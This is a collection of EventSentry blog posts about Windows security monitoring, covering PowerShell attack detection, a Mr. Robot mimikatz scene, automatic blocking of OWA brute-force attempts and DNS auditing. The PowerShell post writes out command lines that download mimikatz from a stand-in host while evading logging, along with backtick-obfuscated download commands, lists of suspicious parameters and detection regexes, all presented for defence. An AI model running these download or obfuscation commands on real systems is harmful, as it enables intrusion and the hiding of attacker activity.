EventSentry SysAdmin Tools: Digital Signature Verification with checksum.exe

Windows supports a code-signing feature called Authenticode, which allows a software publisher to digitally sign executable files (e.g. .exe, .msi, …) so that users can verify their autenticity. The digital signature of a file can be viewed in the file properties in Windows explorer on the “Digital Signature” tab.

Viewing the digital signature of the Opera browser

Digital signature verification has been added to the checksum utility, which already calculates the checksum and entropy of a file. When using the new /s switch, checksum.exe will tell you whether:

  • the file is digitally signed
  • a counter signature exists
  • the digital signature is valid
  • the algorithm used (e.g. SHA 256)
  • who signed the file
  • who issued the certificate
  • when the file was signed

The utility also sets the ERRORLEVEL variable accordingly; if a signature check is requested with the /s switch but the file is unsigned, then checksum.exe will return %ERRORLEVEL% 2. Below is a sample output of the utility in action:

Viewing the digital signature of the Windows ping utility

Digital signature verification will be added to EventSentry’s FIM monitoring component (“File Checksum Monitoring”) in the upcoming v3.4.3 release, which will give you the option to only get notified when unsigned files are changed, thus reducing overall noise.

You can download the latest version from here – enjoy!

From PowerShell to p@W3RH311 – Detecting and Preventing PowerShell Attacks

In part one I provided a high level overview of PowerShell and the potential risk it poses to networks. Of course we can only mitigate some PowerShell attacks if we have a trace, so going forward I am assuming that you followed part 1 of this series and enabled

  • Module Logging
  • Script Block Logging
  • Security Process Tracking (4688/4689)

I am dividing this blog post into 3 distinct sections:

  1. Prevention
  2. Detection
  3. Mitigation

We start by attempting to prevent PowerShell attacks in the first place, decreasing the attack surface. Next we want to detect malicious PowerShell activity by monitoring a variety of events produced by PowerShell and Windows (with EventSentry). Finally, we will mitigate and stop attacks in their tracks. EventSentry’s architecture involving agents that monitor logs in real time makes the last part possible.

But before we dive in … the

PowerShell Downgrade Attack

In the previous blog post I explained that PowerShell v2 should be avoided as much as possible since it offers zero logging, and that PowerShell v5.x or higher should ideally be deployed since it provides much better logging. As such, you would probably assume that basic script activity would end up in of the PowerShell event logs if you enabled Module & ScriptBlock logging and have at least PS v4 installed. Well, about that.

So let’s say a particular Windows host looks like this:

  • PowerShell v5.1 installed
  • Module Logging enabled
  • ScriptBlock Logging enabled

Perfect? Possibly, but not necessarily. There is one version of PowerShell that, unfortunately for us, doesn’t log anything useful whatsoever: PowerShell v2. Also unfortunately for us, PowerShell v2 is installed on pretty much every Windows host out there, although only activated (usable) on those hosts where it either shipped with Windows or where the required .NET Framework is installed. Unfortunately for us #3, forcing PowerShell to use version 2 is as easy as adding -version 2 to the command line. So for example, the following line will download some payload and save it as calc.exe without leaving a trace in any of the PowerShell event logs:

powershell -version 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

However, let’s not forget that PowerShell automatically expands command line parameters if there is no conflict with other parameters, so running

powershell -v 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

does the exact same thing. So when doing pattern matching we need to use something like -v* 2 to ensure we can catch this parameter.

Microsoft seems to have recognized that PowerShell is being exploited for malicious purposes, resulting in some of the advanced logging options like ScriptBlockLogging being supported in newer versions of PowerShell / Windows. At the same time, Microsoft also pads itself on the back by stating that PowerShell is – by far –the most securable and security-transparent shell, scripting language, or programming language available. This isn’t necessarily untrue – any scripting language (Perl, Python, …) can be exploited by an attacker just the same and would leave no trace whatsoever. And most interpreters don’t have the type of logging available that PowerShell does. The difference with PowerShell is simply that it’s installed by default on every modern version of Windows. This is any attackers dream – they have a complete toolkit at their fingertips.

So which Operating Systems are at risk?

PowerShell Version 2 Risk
Windows Version
PowerShell V2
Active By Default
PowerShell V2
Removable?
Threat Level
Windows 7 Yes No Vulnerable
Windows 2008 R2 Yes No Vulnerable
Windows 8 & later No Yes Potentially Vulnerable – depends on .NET Framework v2.0
Windows 2012 & later No Yes Potentially Vulnerable – depends on .NET Framework v2.0
Versions of Windows susceptible to Downgrade Attack

OK, so that’s the bad news. The good news is that unless PowerShell v2 was installed by default, it isn’t “activated” unless the .NET Framework 2.0 is installed. And on many systems that is not the case. The bad news is that .NET 2.0 probably will likely be installed on some systems, making this downgrade attack feasible. But another good news is that we can detect & terminate PowerShell v2 instances with EventSentry (especially when 4688 events are enabled) – because PowerShell v2 can’t always be uninstalled (see table above). And since we’re on a roll here – more bad news is that you can install the required .NET Framework with a single command:

dism.exe /online /enable-feature /featurename:NetFX3 /all

Of course one would need administrative privileges to run this command, something that makes this somewhat more difficult. But attacks that bypass UAC exist, so it’s feasible that an attacker accomplishes this if the victim is a local administrator.

According to a detailed (and very informative) report by Symantec, PS v2 downgrade attacks haven’t been observed in the wild (of course that doesn’t necessarily mean that they don’t exist), which I attribute to the fact that most organizations aren’t auditing PowerShell sufficiently, making this extra step for an attacker unnecessary. I do believe that we will start seeing this more, especially with targeted attacks, as organizations become more aware and take steps to secure and audit PowerShell.

1. Prevention

Well, I think you get the hint: PowerShell v2 is bad news, and you’ll want to do one or all of the following:

  • Uninstall PowerShell v2 whenever possible
  • Prevent PowerShell v2 from running (e.g. via AppLocker)
  • Detect and terminate any instances of PowerShell v2

If you so wish, then you can read more about the PowerShell downgrade attack and detailed information on how to configure AppLocker here.

Uninstall PowerShell v2

Even if the .NET Framework 2.0 isn’t installed, there is usually no reason to have PowerShell v2 installed. I say usually because some Microsoft products like Exchange Server 2010 do require it and force all scripts to run against version 2. PowerShell version 2 can manually be uninstalled (Windows 8 & higher, Windows Server 2012 & higher) from Control Panel’s Program & Features or with a single PowerShell command: (why of course – we’re using PowerShell to remove PowerShell!):

Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart

While running this script is slightly better than clicking around in Windows, it doesn’t help much when you want to remove PowerShell v2.0 from dozens or even hundreds of hosts. Since you can run PowerShell remotely as well (something in my gut already tells me this won’t always be used for honorable purposes) we can use Invoke-Command cmdlet to run this statement on a remote host:

Invoke-Command -Computer WKS1 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart }

Just replace WKS1 with the host name from which you want to remove PowerShell v2 and you’re good to go. You can even specify multiple host names separated by a comma if you want to run this command simultaneously against multiple hosts, for example

Invoke-Command -Computer WKS1,WKS2,WKS3 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart }

Well congratulations, at this point you’ve hopefully accomplished the following:

  • Enabled ModuleLogging and ScriptBlockLogging enterprise-wide
  • Identified all hosts running PowerShell v2 (you can use EventSentry’s inventory feature to see which PowerShell versions are running on which hosts in a few seconds)
  • Uninstalled PowerShell v2 from all hosts where supported and where it doesn’t break critical software

Terminate PowerShell v2

Surgical Termination using 4688 events

If you cannot uninstall PowerShell v2.0, don’t have access to AppLocker or want to find an easier way than AppLocker then you can also use EventSentry to terminate any powershell.exe process if we detect that PowerShell v2.0 was invoked with the -version 2 command line argument. We do this by creating a filter that looks for 4688 powershell.exe events that include the -version 2 argument and then link that filter to an action that terminates that PID.

Filter & Action to terminate PS v2.0
Filter & Action to terminate PS v2.0

If an attacker tries to launch his malicious PowerShell payload using the PS v2.0 engine, then EventSentry will almost immediately terminate that powershell.exe process. There will be a small lag between the time the 4688 event is logged and when EventSentry sees & analyzes the event, so it’s theoretically possible that part of a script will begin executing. In all of the tests I have performed however, even a simple “Write-Host Test” PowerShell command wasn’t able to execute properly because the powershell.exe process was terminated before it could run. This is likely because the PowerShell engine does need a few milliseconds to initialize (after the 4688 event is logged), enough time for EventSentry to terminate the process. As such, any malicious script that downloads content from the Internet will almost certainly terminated in time before it can do any harm.

Shotgun Approach

The above approach won’t prevent all instances of PowerShell v2.0 from running however, for example when the PowerShell v2.0 prompt is invoked through a shortcut. In order to prevent those instances of PowerShell from running we’ll need to watch out for Windows PowerShell event id 400, which is logged anytime PowerShell is launched. This event tells us which version of PowerShell was just launch via the EngineVersion field, e.g. it will include EngineVersion=2.0 when PowerShell v2.0 is launched. We can look for this text and link it to a Service action (which can also be used to terminate processes).

Filter & Action to terminate all powershell instances
Terminate all powershell instances

Note: Since there is no way to correlate a Windows PowerShell event 400 with an active process (the 400 event doesn’t include a PID), we cannot just selectively kill version 2 powershell.exe processes. As such, when a PowerShell version instance is detected, all powershell.exe processes are terminated, version 5 instances. I personally don’t expect this to be a problem, since PowerShell processes usually only run for short periods of time, making it unlikely that a PowerShell v5 process is active while a PowerShell v2.0 process is (maliciously) being launched. But decide for yourself whether this is a practicable approach in your environment.

2. Detection

Command Line Parameters

Moving on to detection, where our objective is to detect potentially malicious uses of PowerShell. Due to the wide variety of abuse possibilities with PowerShell it’s somewhat difficult to detect every suspicious invocation of PowerShell, but there are a number of command line parameters that should almost always raise a red flag. In fact, I would recommend alerting or even terminating all powershell instances which include the following command line parameters:

Highly Suspicious PowerShell Parameters
Parameter
Variations
Purpose
-noprofile -nop Skip loading profile.ps1 and thus avoiding logging
-encoded -e Let a user run encoded PowerShell code
-ExecutionPolicy bypass -ep bypass, -exp bypass, -exec bypass Bypass any execution policy in place, may generate false positives
-windowStyle hidden Prevents the creation of a window, may generate false positives
-version 2 -v 2, -version 2.0 Forces PowerShell version 2
Any invocation of PowerShell that includes the above commands is highly suspicious

The advantage of analyzing command line parameters is that it doesn’t have to rely on PowerShell logging since we can evaluate the command line parameter of 4688 security events. EventSentry v3.4.1.34 and later can retrieve the command line of a process even when it’s not included in the 4688 event (if the process is active long enough). There is a risk of false positives with these parameters, especially the “windowStyle” option that is used by some Microsoft management scripts.

Modules

In addition to evaluating command line parameters we’ll also want to look out for modules that are predominantly used in attacks, such as .Download, .DownloadFile, Net.WebClient or DownloadString. This is a much longer list and will need to be updated on a regular basis as new toolkits and PowerShell functions are being made available.

Depening on the attack variant, module names can be monitored via security event 4688 or through PowerShell’s enhanced module logging (hence the importance of suppressing PowerShell v2.0!), like event 4103. Again, you will most likely get some false positives and have to setup a handful of exclusions.

Command / Code Obfuscation

But looking at the command line and module names still isn’t enough, since it’s possible to obfuscate PowerShell commands using the backtick character. For example, the command.

(New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

could easily be detected by looking for with a *Net.WebClient*, *DownloadString* or the *https* pattern. Curiously enough, this command can also be written in the following way:

Invoke-Expression (New-Object Net.Web`C`l`i`ent)."`D`o`wnloadString"('h'+'t'+'t'+'ps://bit.ly/L3g1t')

This means that just looking for DownloadString or Net.WebClient is not sufficient, and Daniel Bohannon devoted an entire presentation on PowerShell obfuscation that’s available here. Thankfully we can still detect tricks like this with regex patterns that look for a high number of single quotes and/or back tick characters. An example RegEx expression to detect 2 or more back ticks for EventSentry will look like this:

^.*CommandLine=.*([^`]*`){2,}[^`]*.*$

The above expression can be used in PowerShell Event ID 800 events, and will trigger every time a command which involves 2 or more back ticks is executed. To customize the trigger count, simply change the number 2 to something lower or higher. And of course you can look for characters other than the ` character as well, you can just substitute those in the above RegEx as well. Note that the character we look for appears three (3) times in the RegEx, so it will have to be substituted 3 times.

To make things easier for EventSentry users, EventSentry now offers a PowerShell event log package which you can download via the Packages -> Download feature. The package contains filters which will detect suspicious command line parameters (e.g. “-nop”), detect an excessive use of characters used for obfuscation (and likely not used in regular scripts) and also find the most common function names from public attack toolkits.

Evasion

It’s still possible to avoid detection rules that focus on powershell.exe if the attacker manages to execute PowerShell code through a binary other than powershell.exe, because powershell.exe is essentially just the “default vehicle” that facilitates the execution of PowerShell code. The NPS (NotPowerShell) project is a good example and executes PS code through a binary named nps.exe (or whatever the attacker wants to call lit), but there are others. While the thought of running PowerShell code through any binary seems a bit concerning from a defenders perspective, it’s important to point out that downloading another binary negates the advantage of PowerShell being installed by default. I would only expect to see this technique in sophisticated, targeted attacks that possibly start the attack utilizing the built-in PowerShell, but then download a stealth app for all subsequent activity.

This attack can still be detected if we can determine that one of the following key DLLs from the Windows management framework are being loaded by a process other than powershell.exe:

  1. System.Management.Automation.Dll
  2. System.Management.Automation.ni.Dll
  3. System.Reflection.Dll

You can detect this with Sysmon, something I will cover in a follow-up article.

3. Mitigation

EventSentry PowerShell Rules
EventSentry PowerShell Rules

Now, having traces of all PowerShell activity when doing forensic investigations is all well and good, and detecting malicious PowerShell activity after it happened is a step in the right direction. But if we can ascertain which commands are malicious, then why not stop & prevent the attack before it spreads and causes damage?

In addition to the obvious action of sending all logs to a central location, there are few things we can do in response to potentially harmful activity:

1. Send out an alert
2. Mark the event to require acknowledgment
3. Attempt to kill the process outright (the nuclear option)
4. A combination of the above

If the only source of the alert is from one of the PowerShell event logs then killing the exact offending PowerShell process is not possible, and all running powershell.exe processes have to be terminated. If we can identify the malicious command from a 4688 event however, then we can perform a surgical strike and terminate only the offending powershell.exe process – other potentially (presumably benign) powershell.exe processes will remain unharmed and can continue to do whatever they were supposed to do.

If you’re unsure as to how many PowerShell scripts are running on your network (and not knowing this is not embarrassing – many Microsoft products run PowerShell scripts on a regular basis in the background) then I recommend just sending email alerts initially (say for a week) and observe the generated alerts. If you don’t get any alerts or no legitimate PowerShell processes are identified then it should be safe to link the filters to a “Terminate PowerShell” action as shown in the screenshots above.

Testing

After downloading and deploying the PowerShell package I recommend executing a couple of offending PowerShell commands to ensure that EventSentry will detect them and either send out an alert or terminate the process (or both – depending on your level of conviction). The following commands should be alerted on and/or blocked:

powershell.exe -nop Write-Host AlertMe

powershell.exe (New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

powershell.exe `Wr`it`e-`H`ost AlertMeAgain

False Alerts & Noise

Any detection rules you setup, whether with EventSentry or another product, will almost certainly result in false alerts – the amount of which will depend on your environment. Don’t let this dissuade you – simply identify the hosts which are “incompatible” with the detection rules and exclude either specific commands or exclude hosts from these specific rules. It’s better to monitor 98 out of 100 hosts than not monitor any host at all.

With EventSentry you have some flexibility when it comes to excluding rules from one or more hosts:

Conclusion

PowerShell is a popular attack vector on Windows-based systems since it’s installed by default on all recent versions of Windows. Windows admins need to be aware of this threat and take the appropriate steps to detect and mitigate potential attacks:

  1. Disable or remove legacy versions of PowerShell (=PowerShell v2)
  2. Enable auditing for both PowerShell and Process Creation
  3. Collect logs as well as detect (and ideally prevent) suspicious activity

EventSentry users have an excellent vantage point since its agent-based architecture can not only detect malicious activity in real time, but also prevent it. The PowerShell Security event log package, which can be downloaded from the management console, offers a list of rules that can detect many PowerShell-based attacks.

Mr. Robot, Mimikatz and Lateral Movement

In Mr. Robot‘s episode 9 of season 2 (13:53), Angela Moss needs to obtain the Windows domain password of her superior, Joseph Green, in order to download sensitive documents that would potentially incriminate EvilCorp. Since her attack requires physical access to his computer, she starts with a good old-fashioned social engineering attack to get the only currently present employee in the office to leave.

Angela “obtaining” logon credentials

Once in his office, she uses a USB Rubber Ducky, a fast and automated keyboard emulator, to obtain Joseph’s clear text password using mimikatz. Please note that there are some holes in this scene which I will get into later. For now we’ll assume that she was able to obtain his credentials by having physical access to his computer.

USB Rubber Ducky
USB Rubber Ducky

After she gets back to her workstation, she analyzes the capture which reveals Joseph’s password: holidayarmadillo. Not the best password, but for this particular attack the quality of the password wouldn’t have mattered anyways. Mimikatz was (is) able to get the password from memory without utilizing brute force or dictionary techniques. Once she has the password, she logs off and logs back on with Joseph’s user and downloads the documents she needs.

Mimikatz Output
Mimikatz Output

As somebody who helps our users improve the security of their networks, I of course immediately contemplated how this attack could have been detected with EventSentry. Since most users only log on to one workstation on any given day with their user account, Angela logging in with Joseph’s account (resulting in “joseph.green” logging on to two different workstations) would actually be an easy thing to detect.

Lateral Network Movement
Lateral Network Movement

Introduced with v3.4, collector-side thresholds allow the real-time detection of pretty much any user activity that originates from an event, for example user logons or process launches. You can tell EventSentry that (physical) logons for any user on more than one host (within a given time period – say 9 hours) should trigger an alert (aka as “lateral movement”). Had this been in place at EvilCorp, Angela logging in as Joseph would have immediately triggered an alert. With the right procedures in place, countermeasures could have been taken. Of course most viewers wouldn’t want Angela to be caught, so please consider my analysis strictly technical. Watch a short video on lateral detection with EventSentry here.

So what’s the hole? Well, the rubber ducky (mimikatz, really) requires access to an active logon session, which Angela most likely didn’t have. It looked like Joseph had been out of the office for a while, so his computer was likely either locked or turned off, rendering any attack based on mimikatz useless. Mimikatz – since it obtains passwords from memory – only works if the computer is unlocked. And had the computer been unlocked then she could have just downloaded the files from his computer – although this would have been even more risky with people walking around the office.

Cyber attacks are becoming more potent every year and are often sponsored by powerful criminal gangs and/or governments. It’s important that companies employ multiple layers of defense to protect themselves (and their customers) from these increasingly sophisticated and destructive attacks.

EventSentry is the only monitoring solution that utilizes robust agent-based technology that goes beyond logs, enabling the fusion of real-time log monitoring with in-depth system monitoring to not only detect but also react to attacks and anomalies. See for yourself and download a free evaluation of EventSentry.

Securing Exchange Server OWA & ActiveSync – Proactive Security with EventSentry

Almost every company which runs Microsoft Exchange Server needs to make port 443 available to the Internet in order to provide their users access to email via their mobile devices or OWA.

Since both OWA & ActiveSync utilize Active Directory for authentication, exposing OWA/ActiveSync to the Internet indirectly exposes Active Directory as well. While user lockout policies provide some protection against brute force attacks, additional protection methods should be employed. Furthermore, password spraying attacks may be use to circumvent lockout policies – something that would be more likely to succeed in larger organizations.

With the proper auditing enabled (Logon/Logoff – Logon (Failure)) and EventSentry installed however, we can permanently block remote users / hosts who attempt to log on too many times with a wrong password. Setting this up is surprisingly simple:

  1. Windows: Enable (or verify) Auditing
  2. EventSentry: Setup action which creates firewall block rule
  3. EventSentry: Setup filter looking for 4625 Audit Failure events

Bonus: This procedure works with the free version of EventSentry (EventSentry Light) and can be applied to any IIS-based web site which uses authentication.

Windows Auditing

In the group policy settings that affect the server running OWA, make sure that auditing for Failure events in the Audit Logon sub category of the Logon/Logoff category is enabled (of course you can audit success events as well). If you are running the full version of EventSentry v3.4 or later then you can verify all effective audit settings on the Audit Policy Status page for example.

Enabling correct auditing for logon failures

Creating an Action

Since event 4625 contains the IP address of the remote host, the easiest way to subsequently block it is to run the netsh command. In the management console, create a new action by clicking on the “Action” header in the ribbon and selecting the process action as its type. See the screenshot below:

Triggering netsh to block an IP address

The following command line will work in EventSentry v3.4 and later:

advfirewall firewall add rule name="$STRIpAddress $YEAR-$MONTH-$DAY -- automatic block by EventSentry" dir=in interface=any action=block remoteip=$STRIpAddress/32

If you are running EventSentry v3.3 or earlier then you will need to use the $STR20 variable instead:

advfirewall firewall add rule name="$STR20 $YEAR-$MONTH-$DAY -- automatic block by EventSentry" dir=in interface=any action=block remoteip=$STR20/32

The difference here is that v3.4 and later can refer to insertion string variables by name, making the action more universal and potentially applicable to any event that uses the same field name.

When this action is triggered, it will extract the IP address from the event and block it from the system entirely.

Creating a Filter

Create an event log filter which matches Audit Failure events from the Security event log with event id 4625, where insertion string 19 matches the w3wp.exe process (C:\Windows\System32\inetsrv\w3wp.exe). This ensures that only users accessing the host via the web will be subject to blocking. The screenshot below shows the configuration:

Adding a firewall rule from a 4625 audit failure event

This filter can either be added to an existing package or added to a new package that is assigned only to the Exchange server. If the filter is added to an existing package that applies to servers other than the Exchange server, then the computer field of the filter can be used to ensure the filter is evaluated only on the desired host. Select the action created in the previous step.

Since users may occasionally enter an incorrect password I recommend setting up a threshold so that remote IPs are only blocked after 3 or more failed logon attempts. Threshold are configured by clicking on the “Threshold” tab (see the blue “i” above) and an example configuration is shown below. Feel free to adjust the threshold to match your users ability to enter their password correctly :-). Insertion string 20 – which represents the IP address of this event – was selected in the threshold matching section to ensure that each IP address has its own, unique threshold. Note: The event logging settings shown are optional.

Trigger process after 3 failed logon attempts.

Save/deploy or push the configuration to the mail server.

 

Considerations

Triggering a system process from external input is something we should always do with caution. For example, if Windows has an upper limit to the maximum number of rules that can be added, then an attacker could launch a DoS attack IF they had the ability to launch attacks from different IP addresses. Launching a DoS attack from the same IP won’t be possible once they are blocked. You can mitigate this risk by applying a threshold to the EventSentry action calling netsh.exe, for example by limiting it to 100 / hour. This would still provide sufficient protection while also ensuring that only 100 rules could be added per hour (thresholds can be set by clicking on the “Options” button on an action). A regular audit of the netsh execution (e.g. via Process Tracking) would quickly show any sort of abuse.

Over time the number of firewall rules added to the mail server could become rather large, which is why the rules are created with a date appended. This makes managing these rules easier, and the name can also be adapted in the action by changing the “rule name” parameter. The screenshot below shows the inbound firewall rules after two IPs have been blocked:

List of inbound firewall rules

If manual cleanup of firewall rules is not desirable or an option, then the netsh command can also be wrapped into a script which would erase the firewall rule again after a timeout (e.g. 15 minutes). The script could look like this:

"C:\windows\system32\netsh.exe" advfirewall firewall add rule name="%1 %2 -- automatic block by EventSentry" dir=in interface=any action=block remoteip=%1/32
timeout /t 900
"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name="%1 %2 -- automatic block by EventSentry"

In this case you would call the wrapper script instead of the netsh.exe process directly (General Options – Filename) and use the string below as the arguments:

$STRIpAddress $YEAR-$MONTH-$DAY

To keep things simple you can just make the script an embedded script (Tools menu) and reference the script. The timeout value (120 in the above example) is the duration seconds the remote IP will be be blocked. If you want to block the IP for an hour then you would set the timeout value to 3600 instead. When going this route I strongly suggest clearing both event log check boxes in the Options dialog of the action.

Happy Blocking!

Auditing DNS Server Changes on Windows 2012 R2 and later with EventSentry

Auditing changes on Microsoft Windows DNS server is a common requirement and question, but it’s not immediately obvious which versions of Windows support DNS Auditing, how it’s enabled, and where the audit data (and what data) is available. Fortunately Microsoft has greatly simplified DNS Server auditing with the release of Windows Server 2012 R2.

In this post we’ll show how to enable DNS Auditing on 2012 R2 and later, and how to configure EventSentry to collect those audit events. In a future post we’ll also show how to do the same with older versions of Windows – 2008, 2008 R2 & 2012.

When configuration is finished you are going to be able to see when a zone/record is created/modified/deleted as well as by whom. The audit data will be available (and searchable) in the EventSentry Web Reports, and you’ll also be able to setup email alerts when some or all DNS entries are changed.

Prerequisites

Since native DNS auditing was only introduced with Windows 2012 R2 or later you’ll need to run at least Windows Server 2012 R2 in order to follow this guide. The table below shows the types of DNS auditing available on Windows Server Operating Systems:

Windows OS Auditing Type Comments
Windows 2008 Active Directory – based auditing only covered in future post
Windows 2008 R2 Active Directory – based auditing only covered in future post
Windows 2012 Active Directory – based auditing only covered in future post
Windows 2012 R2 Native DNS Auditing Available with hotfix 2956577
(automatically applied via windows update!)
Windows 2016 Native DNS Auditing enabled by default

Configuration

Enhanced DNS logging and diagnostics are enabled by default in supported versions of Windows Server when the “DNS Server” role has been added to Windows, so there are no additional configuration steps that need to be done.

1. Package Creation

On the EventSentry machine we are going to add a package under Packages/Event Logs by right-clicking “Event Logs” and selecting “Add Package”. In this example we are going to call the package “Windows Server 2016”:

Package Creation
Package Creation

2. Adding a Filter

The next step is to add a filter to the previously created package “Windows Server 2016”. Right click the package and then select “Add Filter”.

Adding a DNS Audit filter
Adding the DNS Audit filter

Note: For a short tutorial on how to create a filter click here.

3. Filter Configuration

There are several ways to approach the filter configuration depending on your needs. As a reminder, a filter is a rule in EventSentry that determines to where an event is forwarded to, or how it is processed.

  1. Collect all or select (e.g. creation only) DNS audit data in the database
  2. Email alert on select audit data (e.g. email all deletions)
  3. Email alert on all activity from a specific user

In this guide we will show how to accomplish (1) and (2) as a bonus.

On the right pane of the management console after the creation of the filter you will see the General tab of the new filter. We decided to configure it to log to the Primary Database, but the events can be sent to any action (Email, Syslog, …).

Under “Event Severity” we check all boxes since we want to log everything (it’s important to check “Information” since most of the creation/deletions/etc are logged at this level of severity).

Editing the DNS Audit filter
Editing the DNS Audit filter

4. Adding a custom event log

In the “Log” section click on “more” to jump to the “Custom Event Logs” tab (or, just click on that tab). Now we need to add the Microsoft-Windows-DNSServer/Audit event log to the list of custom event logs so that this filter picks up events from the DNS Audit event log. Click the save button in EventSentry Management Console title bar to save the changes we’ve made so far.

Adding an Application & Services event log
Adding an Application & Services event log

5a. Assigning the package (method A – manual assignment)

To assign the package, select the server you would like to assign it to and select “Assign Packages”. In the resulting dialog simply check the box next to the package we created in step 1. Alternatively you can also select the package and click “Assign” from the ribbon (or context menu) and select a group or host(s) to assign the package to.

Assigning a package
Assigning a package

5b. Assign the package (method B – dynamic activation)

Instead of assigning the package manually, the package can be assigned dynamically so that any host monitored by EventSentry running Windows Server 2012 R2 or later will automatically have this package assigned. To dynamically assign a package do the following:

  • Click the package and select “Properties” from the ribbon, or right-click.
  • In the “Dynamic Activation” section, check “Automatically activate …”
  • In the “Installed Services” field enter “DNS”
  • For the “Operating System”, select “at least” and “Windows 2012 R2”
  • Click the “Global” icon in the ribbon to make sure the package gets assigned to all hosts. Don’t worry, it will still only be activated on 2012 R2 or later hosts that have the DNS server running

6. Saving

After assigning the package and saving the configuration click “Save & Deploy” or push the configuration to all remote hosts. Please note that only new events generated in the DNS Audit Log will be processed, pre-existing log entries will be ignored.

Testing the Configuration

To test the configuration we will create a domain called “testzone.com” and add an A record called www on the monitored DNS server. We’ll then check if those modifications are visible in the EventSentry Web Reports. The screenshot below shows the new A record in the DNS console:

testzone.com with the new A record "www"
testzone.com with the new A record “www”

First, lets take a look to see what the actual DNS Audit entries look like (using the Windows Event Viewer: Applications and Services Logs/Microsoft/Windows/DNS-Server/Audit):

DNS Server Audit Event Log
DNS Server Audit Event Log

In the EventSentry Web Reports, navigate to Logs/Event Log and filter by the log “Microsoft-Windows-DNSServer” and then select “Detailed”. You should see all the modifications that were performed:

Detailed audit log in the web reports
Detailed audit log in the web reports

Bonus Track: Configuring alerts for a specific change

The first part of this post was purposely generic in order to understand the basics of monitoring your DNS Server. But as a bonus we’ll show how to monitor a specific change (in this case a creation) and trigger an email alert for that.

The process is the same as explained in the beginning:

  1. Create a new filter and add it to the same package. The filter should be configured exactly the same way. To make things easier, you can also copy & paste the filter with the familiar Copy/Paste buttons in the ribbon or context menu.
  2. This time however we specify the “Default Email” action in “General” tab so that we receive an email alert when the filter criteria matches an event.
  3. In the “Details” area specify event id 515 in the “Event ID” field, which is the event id corresponding to the creation of a new record. This is how the filter would look like:
Filter for receiving an alert on record creation

Filters can of course be more specific as well, it’s possible to filter based on the user or event content of the actual event. Below is a list of all audit events logged by the DNS Server:

Event ID Type Event ID Type
512 Zone added 551 Clear statistics
513 Zone delete 552 Start scavenging
514 Zone updated 553 Enlist directory partition
515 Record create 554 Abort scavenging
516 Record delete 555 Prepare for demotion
517 RRSET delete 556 Write root hints
518 Node delete 557 Listen address
519 Record create – dynamic update 558 Active refresh trust points
520 Record delete – dynamic update 559 Pause zone
521 Record scavenge 560 Resume zone
522 Zone scope create 561 Reload zone
523 Zone scope delete 562 Refresh zone
525 Zone sign 563 Expire zone
526 Zone unsign 564 Update from DS
527 Zone re-sign 565 Write and notify
528 Key rollover start 566 Force aging
529 Key rollover end 567 Scavenge servers
530 Key retire 568 Transfer key master
531 Key rollover triggered 569 Add SKD
533 Key poke rollover 570 Modify SKD
534 Export DNSSEC 571 Delete SKD
535 Import DNSSEC 572 Modify SKD state
536 Cache purge 573 Add delegation
537 Forwarder reset 574 Create client subnet record
540 Root hints 575 Delete client subnet record
541 Server setting 576 Update client subnet record
542 Server scope create 577 Create server level policy
543 Server scope delete 578 Create zone level policy
544 Add trust point DNSKEY 579 Create forwarding policy
545 Add trust point DS 580 Delete server level policy
546 Remove trust point 581 delete zone level policy
547 Add trust point root 582 Delete forwarding policy
548 Restart server
549 Clear debug logs
550 Write dirty zones

We hope that DNS changes will never remain a mystery after activating DNS auditing. Don’t fear if you’re running 2012 or earlier, the next post is on its way.

Mariano + Ingmar.

Agent vs Agentless: Why you should monitor (event) logs with an agent-based log monitoring solution

The debate as to whether agent-based or agent-less monitoring is “better” has been answered many times over the years in magazine / online articles, blog posts, vendor white papers and others. Unfortunately, most of these articles are often incomplete, inaccurate, biased, or a combination thereof.

To make things slightly more confusing, different ISV use different methods for monitoring servers and workstations. Some use agents, some don’t, and a small few offer both both methods. But what is ultimately the best method?

What are you monitoring?

First it’s important determine what is being monitored to determine whether an agent-based or agent-less approach is better. For example, collecting system metrics like performance data usually creates fewer challenges then transmitting large amounts of (event) log data. Furthermore, agent-based monitoring is not an option for devices which run a proprietary embedded OS (think switch, printer, …) where you can’t install an agent in the first place.

Consequently I’ll be focusing on monitoring (event) logs with an emphasis on Microsoft Windows in this post. Having developed both agent-based as well as agent-less components in C++ over the years I feel that I am in a good position to objectively compare agent-based with agent-less approaches.

The Myths

Monitoring software is of course not the only type of software that uses agents, a lot of other enterprise software (backup, deployment, A/V …) uses agents as well. Below are some of the myths as to what (monitoring) using agents entails:

  • Agents may use up too many resources on the monitored hosts and slow down the monitored machines
  • Agents can become unstable and negatively affect the host OS
  • Deploying and managing agents is tedious and time-consuming
  • Installing agents may require the installation & deployment of dependencies the agents need (.NET, Java, …)
  • Installing third-party software will decrease the security of the monitored host

The Reality

It’s understandable that software which is installed on potentially every server and workstation in a network undergoes some level of scrutiny, but would you be surprised to learn that agents excel in the following areas:

1. Security: Better security since agents push data to a central component, instead of the monitored server being configured to allow remote collection.
2. Reliability: Agents can temporarily store and cache monitored logs if connectivity to the central monitoring server is lost, even if local logs are no longer available. Agents can also take corrective actions more quickly because they can work in isolation (offline). Mobile devices cannot be monitored with agent-less solutions since they cannot be reached by the central monitoring component.
3. Performance: Agents can apply local filtering rules and only transmit data which is valuable, thus increasing throughput while decreasing network utilization.
4. Functionality: They offer more capabilities since there are essentially no limits as to what type of information can be gathered by an agent since it has full access to the monitored system.

The Easy Way Out

Developing agents along with an easy-to-use deployment mechanism requires a lot of time and resources, so it doesn’t come as a surprise to learn that many vendors prefer to monitor hosts without agents. To compensate for the short-fall, ISV which solely have to rely on an agent-less approach will do their best to:

  • Emphasize that they do not use agents
  • Persuade you that agent-less monitoring is preferable

